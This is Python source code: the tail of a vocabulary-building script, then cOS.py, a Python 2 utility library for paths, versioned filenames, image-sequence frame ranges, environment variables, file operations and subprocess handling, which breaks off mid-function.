:param path: Path to pickle file containing the vocabulary.
:return: The loaded vocabulary.
"""
with open(path, "rb") as inp:
vocab = pickle.load(inp)
logger.info('Vocabulary (%d words) loaded from "%s"', len(vocab), path)
return vocab
def vocab_from_json(path: str) -> Dict:
"""
Load vocab from JSON
:param path: Path to json file containing the vocabulary.
:return: The loaded vocabulary.
"""
with open(path, encoding=VOCAB_ENCODING) as inp:
vocab = json.load(inp)
logger.info('Vocabulary (%d words) loaded from "%s"', len(vocab), path)
return vocab
def reverse_vocab(vocab: Dict[str, int]) -> Dict[int, str]:
"""
Returns value-to-key mapping from key-to-value-mapping.
:param vocab: Key to value mapping.
:return: A mapping from values to keys.
"""
return {v: k for k, v in vocab.items()}
def main():
params = argparse.ArgumentParser(
description="CLI to build vocabulary and pre-process input file."
)
required = params.add_argument_group("required arguments")
add_vocab_args(required, params)
args = params.parse_args()
if not args.vocab_source_json or not args.vocab_target_json:
vocab_source, vocab_target = build_from_paths(
input_source=args.train_source,
input_target=args.train_target,
single_vocab=args.single_vocab,
num_words_source=args.num_words_source,
num_words_target=args.num_words_target,
min_count_source=args.word_min_count_source,
min_count_target=args.word_min_count_target,
)
logger.info("Source vocabulary size: %d ", len(vocab_source))
vocab_to_json(vocab_source, "vocab.src" + JSON_SUFFIX)
if not vocab_target:
vocab_target = vocab_source
logger.info("Target vocabulary size: %d ", len(vocab_target))
vocab_to_json(vocab_target, "vocab.trg" + JSON_SUFFIX)
else:
vocab_source = vocab_from_json(args.vocab_source_json)
vocab_target = vocab_from_json(args.vocab_target_json)
vocab_target = vocab_target or vocab_source
write_to_file(
args.train_source, args.train_target, args.train_output, vocab_source, vocab_target
)
if args.val_source and args.val_target:
write_to_file(
args.val_source,
args.val_target,
args.val_output,
vocab_source,
vocab_target,
"validation",
)
if __name__ == "__main__":
main()
|
cOS.py
|
import os
import time
import sys
import subprocess
import glob
import collections
import shutil
from distutils import dir_util
import re
import fnmatch
import Queue
import threading
import getpass
import platform
import multiprocessing
if sys.platform.startswith('win'):
import _winreg
try:
from win32com.client import Dispatch
except ImportError:
pass
# import psutil
try:
import psutil
except:
pass
# Helpers
##################################################
def ensureArray(val):
'''
If input is an array, return input. If not, make it first element of a list.
'''
if isinstance(val, (list, tuple)):
return list(val)
if (val == None):
return []
return [val]
# Normalization
##################################################
def ensureEndingSlash(path):
'''
Ensures that the path has a trailing '/'
'''
path = unixPath(path)
if path[-1] != '/':
path += '/'
return path
def removeStartingSlash(path):
'''
Removes backslashes and forward slashes from the
beginning of directory names.
'''
if (path[0] == '\\' or path[0] == '/'):
path = path[1:]
return path
def normalizeDir(path):
'''
Dirs always use forward slashses and have a trailing slash.
'''
# lower case drive leters
if path[1] == ':':
path = path[0].lower() + path[1:]
# ensureEndingSlash already makes sure
# the path is a unixPath
return ensureEndingSlash(path)
def normalizePath(path):
'''
Replaces all backslashes
with forward slashses.
Removed: removeStartingSlash
'''
return unixPath(path)
def normalizeAndJoin(path, *paths):
'''
Joins paths, replacing backslashes with forward slashes.
'''
return normalizePath(os.path.join(ensureEndingSlash(path), *paths))
def unixPath(path):
'''
Changes backslashes to forward slashes and
removes successive slashes, ex \\ or \/
'''
# lower case drive leters
if len(path) > 1 and path[1] == ':':
path = path[0].lower() + path[1:]
# bit hacky, but basically we want to keep
# :// for http:// type urls
# so we split on that, replace the slashes in the parts
# then join it all back together
parts = path.split('://')
replaced = [re.sub(r'[\\/]+', '/', p) for p in parts]
return '://'.join(replaced)
# Extensions
##################################################
def getExtension(path):
'''
Returns file extension all lowercase with no whitespace
'''
pathParts = path.split('.')
if len(pathParts) > 1:
if pathParts[-1].lower() == 'sc':
return '.'.join([pathParts[-1], pathParts[-2]]).lower().strip()
return pathParts[-1].lower().strip()
return ''
def normalizeExtension(filepath):
'''
Returns file extension all lowercase with no whitespace
'''
filepath = unixPath(filepath)
extension = getExtension(filepath)
filePieces = filepath.split('.')
filePieces[-1] = extension
return '.'.join(filePieces)
def removeExtension(filename):
'''
Removes extension from filename.
'''
if '.' not in filename:
return filename
return '.'.join(filename.split('.')[:-1])
def ensureExtension(filename, extension):
'''
Checks that a given file has the given extension.
If not, appends the extension.
'''
extension = extension.lower().strip()
if extension[0] == '.':
extension = extension[1:]
if (getExtension(filename) != extension):
return filename + '.' + extension
return filename
# Initials
##################################################
def getInitials(filename):
versionUserRegEx = re.compile(r'_[vV][0-9]{3,4}_([a-z]{3})?')
versionUserSearch = versionUserRegEx.search(filename)
if versionUserSearch:
return versionUserSearch.group(1)
return None
# Versioning
##################################################
def getVersion(filename):
'''
Returns version number of a given filename.
'''
try:
if str(int(filename)) == filename:
return int(filename)
except:
pass
try:
if int(filename) == filename:
return int(filename)
except:
pass
match = re.findall('[vV]([0-9]+)', filename)
if (match):
return int(match[-1])
return None
def incrementVersion(filename, initials=''):
'''
Increments a file's version number
'''
version = getVersion(filename) + 1
# _v0001_abc.
withInitials = r'_[vV][0-9]+_[a-z]{3}\.'
# _v0001
withoutInitials = r'_[vV][0-9]+'
# _abc.ext
noVersion = r'_[a-z]{3}\.([a-z0-9]+)$'
if len(initials):
if not re.search(withInitials, filename):
m = re.search(noVersion, filename)
if not m:
raise Exception('Filename version and initials do not match expected format.')
# A_abc.ext -> A_v0001_xyz.ext
return re.sub(noVersion, '_v0001_%s.%s' % (initials, m.group(1)), filename)
# A_v0001_abc.ext -> A_v0002_xyz.ext
return re.sub(withInitials, '_v%04d_%s.' % (version, initials), filename)
else:
# A_v0001_abc.ext -> A_v0002_abc.ext
return re.sub(withoutInitials, '_v%04d' % version, filename)
def getHighestVersionFilePath(root, name=None, extension=''):
'''
Returns highest version from a given root, matching a given extension.
'''
# fix: should have normalize extension
# ensure dot on extension
if not len(extension) or extension[0] != '.':
extension = '.' + extension
root = normalizeDir(root)
highestVersion = -99999999
path = False
if not name:
for f in glob.iglob(root + '*' + extension):
# keeps .nk~ etc from showing up
if not f.endswith(extension):
continue
fileVersion = getVersion(f)
if fileVersion > highestVersion:
path = unixPath(f)
highestVersion = fileVersion
else:
# regex for checking and getting user info if it exists d version info
versionUserRegEx = re.compile('_v[0-9]{4}(_[a-z]{3})?')
versionUser = ''
if versionUserRegEx.search(name):
versionUser = versionUserRegEx.search(name).group()
onlyName = name.replace(versionUser, '')
for f in glob.iglob(root + onlyName + '*' + extension):
# keeps .nk~ etc from showing up
if not f.endswith(extension):
continue
fileVersion = getVersion(f)
if fileVersion > highestVersion:
path = unixPath(f)
highestVersion = fileVersion
return path
def createVersionedFilename(filename, version, padding=4, extension=''):
'''
Returns filename with version and extension
'''
return filename + '_v' + str(version).zfill(padding) + '.' + extension
# Information
##################################################
def getDirName(filename):
'''
Returns directory name of a file with a trailing '/'.
'''
return normalizeDir(os.path.dirname(filename))
def upADir(path):
'''
Returns the path, up a single directory.
'''
path = getDirName(path)
parts = path.split('/')
if (len(parts) < 3):
return path
return '/'.join(parts[:-2]) + '/'
def getPathInfo(path, options={}):
'''
Returns object with file's basename, extension, name, dirname and path.
With options, can also return root, relative dirname, and relative path, and
make all fields lowercase.
'''
if not path or len(path) == 0:
return {
'path': '',
'dirname': '',
'basename': '',
'extension': '',
'name': '',
'filebase': '',
'root': '',
'relativeDirname': '',
'relativePath': '',
}
pathInfo = {}
pathInfo['path'] = normalizePath(path)
pathParts = pathInfo['path'].split('/')
pathInfo['dirname'] = '/'.join(pathParts[:-1]) + '/'
pathInfo['basename'] = pathParts[-1]
pathInfo['extension'] = pathParts[-1].split('.')[-1].strip().lower()
if pathInfo['extension'] == 'sc':
pathInfo['extension'] = '.'.join(pathParts[-1].split('.')[-2:]).strip().lower()
pathInfo['name'] = pathInfo['basename'].replace('.' + pathInfo['extension'], '')
pathInfo['filebase'] = pathInfo['path'].replace('.' + pathInfo['extension'], '')
# fix: relative path could be improved but it's a start
if options.get('root'):
pathInfo['root'] = normalizeDir(options['root'])
pathInfo['relativeDirname'] = './' + removeStartingSlash(normalizeDir(pathInfo['dirname'].replace(pathInfo['root'], '')))
pathInfo['relativePath'] = './' + removeStartingSlash(normalizePath(pathInfo['path'].replace(pathInfo['root'], '')))
else:
# for linux
if pathParts[0] == '':
pathInfo['root'] = '/' + pathParts[1] + '/'
# for windows
else:
pathInfo['root'] = pathParts[0] + '/'
if options.get('lowercaseNames'):
# uncomment in Sublime 3
# pathInfo = {x: x.lower() for x in pathInfo}
pathInfo = dict([(x, x.lower()) for x in pathInfo])
return pathInfo
# fix:
# this:
# text/frame.%04d.exr
# will match
# text/frame.tacos.bananas.%04d.exr
# cuz getFiles needs to take a regex
def getFrameRange(path):
'''
Returns a dictionary with min, max, duration,
base, ext, and complete
Parameters:
path - Generic file in sequence. Ex. text/frame.%04d.exr
'''
if not isValidSequence(path):
print 'Not a valid sequence'
return None
path = normalizeFramePadding(path)
padding = getPadding(path)
pathInfo = getPathInfo(path)
extension = pathInfo['extension']
seqDir = pathInfo['dirname']
seqName = '.'.join(pathInfo['name'].split('.')[:-1])
digitsPadding = '\.\d+\.'
files = getFiles(seqDir,
fileIncludes=[seqName + digitsPadding + extension], depth=0, filesOnly=True, regex=True)
if not len(files):
return None
files.sort()
firstFileInfo = getPathInfo(files[0])
try:
minFrame = int(firstFileInfo['name'].split('.')[-1])
maxFrame = int(getPathInfo(files[-1])['name'].split('.')[-1])
except:
return None
if padding == 0:
paddingString = '%d'
else:
paddingString = '%0' + str(padding) + 'd'
duration = maxFrame - minFrame + 1
count = len(files)
return {
'min': minFrame,
'max': maxFrame,
'duration': duration,
'base': firstFileInfo['dirname'] + firstFileInfo['name'],
'baseUnpadded': seqName,
'extension': extension,
'complete': duration == count,
'path': path,
'padding': padding,
'paddingString': paddingString,
'paddedFilename': seqName + '.' + paddingString + '.' + extension,
'paddedPath': seqDir + seqName + '.' + paddingString + '.' + extension,
}
# copy of arkUtil's get padding, it does not throw an error,
# but returns 0 if padding is 0
# To Do: use this in place of arkUtil getPadding soon!
def getPadding(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameReg = re.compile('%[0-9]{0,2}d')
frameNumberReg = re.compile('[0-9]+')
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return 0
# gets position of frame padding
framePadding = fName.split('.')[-1]
if hashReg.match(framePadding):
padding = framePadding.count('#')
elif dollarReg.match(framePadding):
padding = framePadding[-1]
if padding == 'F':
return 0
elif frameReg.match(framePadding):
paddingReg = re.compile('[0-9]{1,2}')
if paddingReg.search(framePadding):
padding = paddingReg.search(framePadding).group()
else:
return 0
elif frameNumberReg.match(framePadding):
padding = len(framePadding)
if padding <= 2:
return 0
else:
return 0
return int(padding)
def normalizeFramePadding(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameNumberReg = re.compile('[0-9]+')
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return filepath
# gets position of frame padding
framePadding = fName.split('.')[-1]
if hashReg.match(framePadding):
padding = framePadding.count('#')
elif dollarReg.match(framePadding):
padding = framePadding[-1]
# if no number exists after $F then padding is None
if padding == 'F':
padding = None
elif frameNumberReg.match(framePadding):
padding = len(framePadding)
# if total number of digits is less than 2 then assume padding is None
if padding <= 2:
padding = None
else:
return filepath
# if padding is None(A.B.1.abc), then padded file name will be (A.B.%d.abc)
# if there is no padding(A.B.abc), then padded file will still be A.B.abc
newPadding = '%0' + str(padding) + 'd'
if not padding:
newPadding = '%d'
return filepath.replace(framePadding, newPadding)
def isValidSequence(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return False
# gets position of frame padding
framePadding = fName.split('.')[-1]
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameReg = re.compile('%[0-9]{0,2}d')
frameNumberReg = re.compile('[0-9]+')
# if padding text match with any padding regex
if not hashReg.match(framePadding) and not \
dollarReg.match(framePadding) and not \
frameReg.match(framePadding) and not \
frameNumberReg.match(framePadding):
return False
return True
def getSequenceBaseName(filename, matchNumbersOnly=True):
if matchNumbersOnly:
regex_baseName = re.compile('(.+)[_\.][0-9]+\.[a-z0-9]+$')
else:
# name.%04d.ext
regex_baseName = re.compile('(.+)[_\.]%[0-9]+d\.[a-z0-9]+$')
filename = normalizeFramePadding(filename)
try:
baseName = regex_baseName.search(filename).group(1)
return baseName
except:
raise IndexError('The filename given does not have the \
format <name>_<frameNumber>.<extension> or \
<name>.<frameNumber>.<extension>: %s' % filename)
def getFrameNumber(filename):
regex_FrameNumber = re.compile('.+[_\.]([0-9]+)\.[a-z0-9]+$')
try:
frame = regex_FrameNumber.search(filename).group(1)
return frame
except:
raise IndexError('The filename given does not have the \
format <name>_<frameNumber>.<extension> or \
<name>.<frameNumber>.<extension>: %s' % filename)
def isFrameRangeText(filename):
regex = re.compile('^[a-zA-Z0-9._/:%]+ [0-9]+-[0-9]+$')
return regex.match(filename) is not None
def getFrameRangeText(filename, frameRange=None):
if not frameRange:
frameRange = getFrameRange(filename)
if not frameRange:
raise Exception('Invalid filename: ' + filename)
return filename + ' %d-%d' % \
(frameRange['min'], frameRange['max'])
def getFirstFileFromFrameRangeText(fileText):
'''
Supports 3 methods of import for imageSequences
Gets frame: 1001 of imageSequence
Uses getFrameRange to find all images in matching sequence
Requires filename in format '../image.%0[1-9]d.png' etc,
with %0[1-9]d or other type of specification included in string
'''
filepath = normalizePath(fileText)
filePieces = filepath.split(' ')
filePieces[0] = normalizeFramePadding(filePieces[0])
fileInfo = getPathInfo(filePieces[0])
paddingRegEx = re.compile('%[0-9]{0,2}d')
if len(filePieces) == 2 and \
paddingRegEx.search(filePieces[0]) and \
unicode(filePieces[1].split('-')[0]).isnumeric():
padding = fileInfo['name'].split('.')[-1]
frame = padding % int(filePieces[1].split('-')[0])
filepath = filePieces[0].replace(padding, frame)
elif len(filePieces) == 1 and \
paddingRegEx.search(filePieces[0]):
padding = fileInfo['name'].split('.')[-1]
frameRangeDict = getFrameRange(fileText)
if not frameRangeDict:
return False
frame = padding % int(frameRangeDict['min'])
filepath = frameRangeDict['base'].replace(padding, frame) + '.' + frameRangeDict['extension']
elif len(filePieces) == 1:
pathInfo = getPathInfo(filePieces[0])
try:
if unicode(pathInfo['name'].split('.')[-1]).isnumeric():
filepath = filePieces[0]
else:
return False
except:
return False
else:
print 'Invalid image sequence!'
return False
return filepath
def openFileBrowser(path):
if os.path.isfile(path):
path = path.rpartition('/')[0]
if isWindows():
os.startfile(path)
if isLinux():
subprocess.check_call(['xdg-open', '--', path])
if isMac():
subprocess.check_call(['open', '--', path])
def isValidEXR(filename, silent=False):
import OpenImageIO
image = OpenImageIO.ImageInput.open(filename)
if not image:
if not silent:
print 'Invalid EXR, not found:', filename
return False
try:
spec = image.spec()
if spec.tile_width == 0:
for y in range(spec.y, spec.y + spec.height):
pixels = image.read_scanline (y, spec.z, OpenImageIO.UNKNOWN)
if pixels == None:
if not silent:
print 'ERROR: EXR broken at scanline', y
return False
return True
except Exception as err:
if not silent:
print err
return False
def isValidEXRSequence(paddedFilename, silent=False):
frameRange = getFrameRange(paddedFilename)
if not frameRange or not frameRange['complete']:
return False
for f in range(frameRange['min'], frameRange['max'] + 1):
if not isValidEXR(frameRange['path'] % f):
return False
return True
# System Operations
##################################################
# fix: needs to work for linux / osx
def setEnvironmentVariable(key, val, permanent=True):
'''
Sets a given environment variable for the OS.
Parameters:
key - environment variable
val - value for the environment variable
'''
val = str(val)
os.environ[key] = val
if not permanent:
return True
# set the environment variable permanently
# super simple on windows, just use setx
if isWindows():
os.system('setx %s "%s"' % (key, val))
# set variables in the /etc/environment file
# on mac and linux
elif isMac() or isLinux():
os.system('export %s=%s' % (key, val))
environmentFile = '/etc/environment'
setString = key + '=' + val + '\n'
# read all the lines in
with open(environmentFile) as f:
lines = f.readlines()
found = False
i = 0
while i < len(lines):
if lines[i].startswith(key + '='):
# if we've already set the variable
# just remove the line
if found:
del lines[i]
# otherwise ensure the line is set
# to the correct value
else:
lines[i] = setString
found = True
i += 1
# if we never found the variable
# append a line to set it
if not found:
lines.append(setString)
# then write all the lines back to the
# environmentFile
with open(environmentFile, 'w') as f:
for line in lines:
f.write(line.replace(' ',''))
def removeEnvironmentVariable(key):
'''
Deletes environment variable
Parameters:
key - environment variable
'''
if isWindows():
if key in os.environ:
currentUserKeyReg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
envKeyReg = _winreg.OpenKey(currentUserKeyReg, 'Environment', 0, _winreg.KEY_ALL_ACCESS)
try:
_winreg.DeleteValue(envKeyReg, key)
except WindowsError:
print 'Couldn\'t find ', key
pass
_winreg.CloseKey(envKeyReg)
def joinEnvironmentPaths(*args):
'''
Joins all unique non-None paths, useful for setting paths in environment variables
'''
return os.pathsep.join(filter(None, set(args)))
def conformEnvironment(mapping):
'''Ensure all entries in *mapping* are strings.
Stolen from ftrack.
.. note::
The *mapping* is modified in place.
'''
if not isinstance(mapping, collections.MutableMapping):
return
for key, value in mapping.items():
if isinstance(value, collections.Mapping):
conformEnvironment(value)
else:
value = str(value)
del mapping[key]
mapping[str(key)] = value
# unset variables in the /etc/environment file
# on mac and linux
# WORK IN PROGRESS
# elif isLinux():
# os.system('export %s=%s' % (key))
# environmentFile = '/etc/environment'
# unsetString = key + '\n'
# # read all the lines in
# with open(environmentFile) as f:
# lines = f.readlines()
# found = False
# i = 0
# while i < len(lines):
# if lines[i].startswith(key):
# # if we've already unset the variable
# # just remove the linereg
# if found:
# del lines[i]
# # otherwise ensure the line is set
# # to the correct value
# else:
# lines[i] = unsetString
# found = True
# i += 1
# # if we never found the variable
# # append a line to set it
# if not found:
# lines.append(unsetString)
# # then write all the lines back to the
# # environmentFile
# with open(environmentFile, 'w') as f:
# for line in lines:
# f.write(line.replace(' ',''))
# windows shortcuts, from some blog mouse vs python
def createShortcut(path, target='', wDir='', icon=''):
ext = path[-3:]
if ext == 'url':
shortcut = file(path, 'w')
shortcut.write('[InternetShortcut]\n')
shortcut.write('URL=%s' % target)
shortcut.close()
else:
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.WorkingDirectory = wDir
if icon == '':
pass
else:
shortcut.IconLocation = icon
shortcut.save()
def makeDir(dirname):
'''
Wrapper for os.makeDir.
'''
try:
os.mkdir(dirname)
return True
except Exception as err:
return err
def makeDirs(path):
'''
Wrapper for os.makedirs.
'''
dirName = getDirName(path)
try:
os.makedirs(dirName)
except Exception as err:
return err
def join(a, b):
'''
Concatenates a directory with a file path
using forward slashes.
'''
b = removeStartingSlash(b)
return normalizeDir(a) + normalizePath(b)
def removeFile(path):
'''
Wrapper for os.remove, returns the error instead of
throwing it
'''
if os.path.isdir(path):
return Exception('Path is a directory, not a file')
try:
os.remove(path)
return True
except Exception as err:
# If error is "not exists", don't raise, just return
if not os.path.exists(path):
return err
else:
raise err
def removeDir(path):
'''
Removes a directory. Returns the error instead of
throwing it
'''
if os.path.isfile(path):
return Exception('Path is a file, not a directory')
try:
shutil.rmtree(path)
return True
except Exception as err:
# If error is "not exists", don't raise, just return
if not os.path.exists(path):
return err
else:
raise err
def emptyDir(folder,onlyFiles=False, waitTime=5):
'''
Removes all files and folders from a directory.
Parameters:
folder - directory from which to delete
onlyFiles - False by default, if only files should be deleted
waitTime - 5 by default, how many seconds to wait.
'''
# if onlyFiles:
# print 'Deleting all files in: %s' % folder
# else:
# print 'Deleting all files and folders in: %s' % folder
startTime = time.time()
for root, dirs, files in os.walk(folder):
if (time.time() > startTime + waitTime):
break
for f in files:
if (time.time() > startTime + waitTime):
break
try:
os.unlink(os.path.join(root, f))
except:
pass
if not onlyFiles:
for d in dirs:
if (time.time() > startTime + waitTime):
break
try:
shutil.rmtree(os.path.join(root, d))
except:
pass
def copy(src, dst):
return shutil.copy2(src, dst)
def copyTree(src, dst, symlinks=False, ignore=None):
'''
Copies the src directory tree to the destination.
'''
dir_util.copy_tree(src, dst)
def copyFileSequence(src, dst, rangeInfo=False, echo=False):
if '%' not in src:
print 'No frame padding in:', src
return False
if '%' not in dst:
print 'No frame padding in:', dst
return False
if not rangeInfo:
rangeInfo = getFrameRange(src)
result = True
for i in range(rangeInfo['min'], rangeInfo['max'] + 1):
sourcePath = src % i
destPath = dst % i
if echo:
print sourcePath, ' > ', destPath
try:
shutil.copyfile(sourcePath, destPath)
except:
print 'Could not copy:', sourcePath, destPath
result = False
return result
def rename(oldPath, newPath):
oldPath = normalizePath(oldPath)
newPath = normalizePath(newPath)
os.rename(oldPath, newPath)
def cwd():
'''
Returns the current working directory.
'''
return normalizeDir(os.getcwd())
def getOSUsername():
if isLinux():
return os.getenv('USER')
else:
return getpass.getuser()
def getComputerName():
return platform.node()
def setComputerName(computerName):
currentName = platform.node()
if isWindows():
getCommandOutput('wmic computersystem where caption="'+ currentName + '" rename ' + computerName)
elif isLinux():
getCommandOutput('hostnamectl set-hostname "' + computerName + '"')
else:
raise Exception('Invalid OS')
def getUserHome():
userHome = os.environ.get('HOME') or os.environ.get('HOMEPATH') or os.environ.get('USERPROFILE')
return normalizeDir(userHome)
def duplicateDir(src, dest):
'''
Duplicates a directory, copying files that don't already exist.
'''
src = ensureEndingSlash(src)
dest = ensureEndingSlash(dest)
for root, dirs, files in os.walk(src):
for n in dirs:
srcFolder = root + '/' + n
print 'dir:', srcFolder
destFolder = srcFolder.replace(src, dest)
if not os.path.isdir(destFolder):
try:
os.makedirs(destFolder)
print 'mkdir:', destFolder
except Exception as err:
print err
print 'Could not mkdir: ', destFolder
for n in files:
srcFilename = root + '/' + n
print 'file:', srcFilename
destFilename = srcFilename.replace(src, dest)
if not os.path.isfile(destFilename):
try:
print 'copy:', srcFilename
shutil.copy(srcFilename, destFilename)
except Exception as err:
print err
print 'Could not copy: ', srcFilename
else:
print 'exists:', srcFilename
def getFolderContents(filepath, includeFiles=True, includeFolders=True):
'''
Returns files and folders directly under the path.
'''
paths = []
files = os.listdir(filepath)
for f in files:
filename = os.path.join(filepath, f)
isDir = os.path.isdir(filename)
if includeFolders and isDir:
paths.append(normalizeDir(filename))
elif includeFiles and not isDir:
paths.append(normalizePath(filename))
return paths
def collectFiles(searchPaths, extensions, exclusions):
'''
Gets all files in the searchPaths with given extensions.
Parameters:
searchPaths - list of paths to search
extensions - list of extensions for which to look
exclusions - files to exclude from final list
'''
filesToReturn = []
searchPaths = ensureArray(searchPaths)
extensions = ensureArray(extensions)
exclusions = ensureArray(exclusions)
for path in searchPaths:
for root, dirs, files in os.walk(path):
for name in files:
name = join(normalizeDir(root), normalizePath(name))
if (getExtension(name) in extensions) and (name not in exclusions):
if name not in filesToReturn:
filesToReturn.append(getPathInfo(name))
return filesToReturn
def collectAllFiles(searchDir):
'''
Returns all files within a specified searchDir.
'''
searchDir = normalizeDir(searchDir)
filesToReturn = []
for root, dirs, files in os.walk(searchDir):
for name in files:
name = join(normalizeDir(root), normalizePath(name))
if name not in filesToReturn:
filesToReturn.append(getPathInfo(name))
return filesToReturn
def collapseFiles(fileList, imageSequencesOnly=False):
fileList.sort()
collapsedList = []
i = 0
# New Logic to rename sequential files in QList
# [abc_xyz.1001.png, abc_xyz.1002.png]
while i < len(fileList):
# [abc_xyz][1001][png]
fileSections = fileList[i].split('.')
# check if name is not an image sequence
if len(fileSections) <= 2:
if not imageSequencesOnly:
collapsedList.append(fileList[i])
i += 1
else:
try:
# check if second last piece is a number or not
int(fileSections[-2])
# leftFileSection = [abc_xyz]
leftFileSection = fileSections[0]
# rightFileSection = [png]
rightFileSection = fileSections[2]
j = i
# keep incrementing second loop till left and right sections are the same
while j < len(fileList) and \
leftFileSection == fileSections[0] and \
rightFileSection == fileSections[2]:
j += 1
try:
# [abc_xyz][1002][png]
newFilePieces = fileList[j].split('.')
# [abc_xyz]
leftFileSection = newFilePieces[0]
# [png]
rightFileSection = newFilePieces[2]
except IndexError:
pass
lastFrame = j
collapsedList.append(fileSections[0] +
'.%0' + str(len(fileSections[1])) + 'd.' +
fileSections[2] + ' ' +
str(int(fileSections[-2])) + '-' +
str(int(fileSections[-2]) + lastFrame - i - 1))
i = j
except ValueError:
collapsedList.append(fileList[i])
i += 1
return collapsedList
# def getDirs(path):
# return getFiles(path, fileExcludes=['*'], depth=0)
# fix: add depth
def getFiles(path,
fileIncludes=[],
folderIncludes=[],
fileExcludes=[],
folderExcludes=[],
includeAfterExclude=False,
depth=-1,
filesOnly=False,
fullPath=True,
regex=False):
'''
if the folder or file include/exclude lists have an *
getFiles() will use wildcard matching, otherwise it will
use simple "in"-style matching
Ex:
'''
if fileIncludes:
fileIncludes = ensureArray(fileIncludes)
if folderIncludes:
folderIncludes = ensureArray(folderIncludes)
if fileExcludes:
fileExcludes = ensureArray(fileExcludes)
if folderExcludes:
folderExcludes = ensureArray(folderExcludes)
def pathMatches(pattern, path, fullPath):
return (not regex and \
('*' in pattern and \
(fnmatch.fnmatch(fullPath, pattern) or \
fnmatch.fnmatch(path, pattern))) or \
pattern in fullPath) or \
(regex and \
(re.match(pattern, fullPath) or \
re.match(pattern, path)))
def shouldInclude(path, root, isDir=False):
fullPath = unixPath(os.path.join(root, path))
if fileIncludes and not isDir:
for pattern in fileIncludes:
if pathMatches(pattern, path, fullPath):
return True
if not includeAfterExclude:
return False
if folderIncludes and isDir:
for pattern in folderIncludes:
if pathMatches(pattern, path, fullPath):
return True
if not includeAfterExclude:
return False
if isDir:
for pattern in folderExcludes:
if pathMatches(pattern, path, fullPath):
return False
else:
for pattern in fileExcludes:
if pathMatches(pattern, path, fullPath):
return False
return True
# custom walk method with depth
# link for reference: http://stackoverflow.com/questions/229186/os-walk-without-digging-into-directories-below
def walkLevel(directory, depth=-1):
directory = directory.rstrip(os.path.sep)
assert os.path.isdir(directory)
numSeperators = directory.count(os.path.sep)
for root, dirs, files in os.walk(directory):
dirs[:] = [d for d in dirs if shouldInclude(d, root, True)]
yield root, dirs, files
currentSeperators = root.count(os.path.sep)
if depth > -1:
if numSeperators + depth <= currentSeperators:
del dirs[:]
if fileIncludes:
fileIncludes = ensureArray(fileIncludes)
if folderIncludes:
folderIncludes = ensureArray(folderIncludes)
if fileExcludes:
fileExcludes = ensureArray(fileExcludes)
if folderExcludes:
folderExcludes = ensureArray(folderExcludes)
try:
allFiles = []
for root, dirs, files in walkLevel(path, depth):
for d in dirs:
filepath = unixPath(os.path.join(root, d))
if not filesOnly and shouldInclude(d, root, True):
if fullPath:
allFiles.append(filepath)
else:
allFiles.append(filepath.replace(path, ''))
for f in files:
filepath = unixPath(os.path.join(root, f))
if shouldInclude(f, root, False):
if fullPath:
allFiles.append(filepath)
else:
allFiles.append(filepath.replace(path, ''))
return allFiles
except:
print 'folder not found:', path
return []
# Processes
##################################################
def getParentPID():
'''
Returns the process ID of the parent process.
'''
# Try/catch for old versions of old versions of psutil
try:
psutil.Process(os.getpid()).ppid
except TypeError as err:
print 'Psutil version 1.2 supported. Please revert.'
raise err
def runCommand(processArgs,env=None):
'''
Executes a program using psutil.Popen, disabling Windows error dialogues.
'''
command = ' '.join(ensureArray(processArgs))
os.system(command)
# returns the output (STDOUT + STDERR) of a given command
def getCommandOutput(command, quiet=False, cwd=None, shell=True, env=None, **kwargs):
try:
if not quiet:
print 'command:\n', command
output = subprocess.check_output(
command,
cwd=cwd,
stderr=subprocess.STDOUT,
shell=shell,
env=env,
**kwargs)
if output and \
len(output) > 0 and \
output[-1] == '\n':
output = output[:-1]
if not output:
output = ''
return (output.lower(), False)
except subprocess.CalledProcessError as err:
return (False, err.output.lower())
except Exception as err:
return (False, err)
# wrapper of get command output, to fix OS issue
# takes in list of strings, if linux joins command list with spaces
def getCommandOutputParsed(command, quiet=False, cwd=None, shell=True, env=None, **kwargs):
parsed = command
if isLinux() and isinstance(parsed, list):
parsed = [' '.join(parsed)]
return getCommandOutput(parsed, quiet, cwd, shell, env, **kwargs)
# fix: should use a better methodology for this
# pretty sure python has some way of running a file
def runPython(pythonFile):
'''
Executes a given python file.
'''
return os.system('python ' + pythonFile)
def waitOnProcess(process,
checkInFunc=False,
checkErrorFunc=False,
timeout=False,
loggingFunc=False,
checkInInterval=10,
outputBufferLength=10000):
if not loggingFunc:
def loggingFunc(*args):
print ' '.join([str(arg) for arg in args])
if not checkInFunc:
def checkInFunc(*args):
return True
if not checkErrorFunc:
def checkErrorFunc(*args):
return True
def queueOutput(out, outQueue):
if out:
for line in iter(out.readline, ''):
outQueue.put(line)
out.close()
def checkProcess(process):
if not process.is_running():
print 'Process stopped'
return False
# STATUS_ZOMBIE doesn't work on Windows
if not isWindows():
return process.status() != psutil.STATUS_ZOMBIE
return True
def getQueueContents(queue, printContents=True):
contents = ''
lines = 0
maxLines = 500
while not queue.empty() and lines < maxLines:
line = queue.get_nowait()
contents += line
if printContents:
# remove the newline at the end
print line[:-1]
lines += 1
if lines >= maxLines:
print '\n\n\nbailed on getting the rest of the queue'
queue.queue.clear()
return contents
lastUpdate = 0
out = newOut = ''
err = newErr = ''
processStartTime = int(time.time())
# threads dies with the program
outQueue = Queue.Queue()
processThread = threading.Thread(target=queueOutput, args=(process.stdout, outQueue))
processThread.daemon = True
processThread.start()
errQueue = Queue.Queue()
errProcessThread = threading.Thread(target=queueOutput, args=(process.stderr, errQueue))
errProcessThread.daemon = True
errProcessThread.start()
while checkProcess(process):
newOut = getQueueContents(outQueue, printContents=False)
newErr = getQueueContents(errQueue, printContents=False)
out += newOut
err += newErr
# remove starting and trailing whitespace
newErr = newErr.strip()
if newOut:
loggingFunc(newOut[:-1])
if newErr:
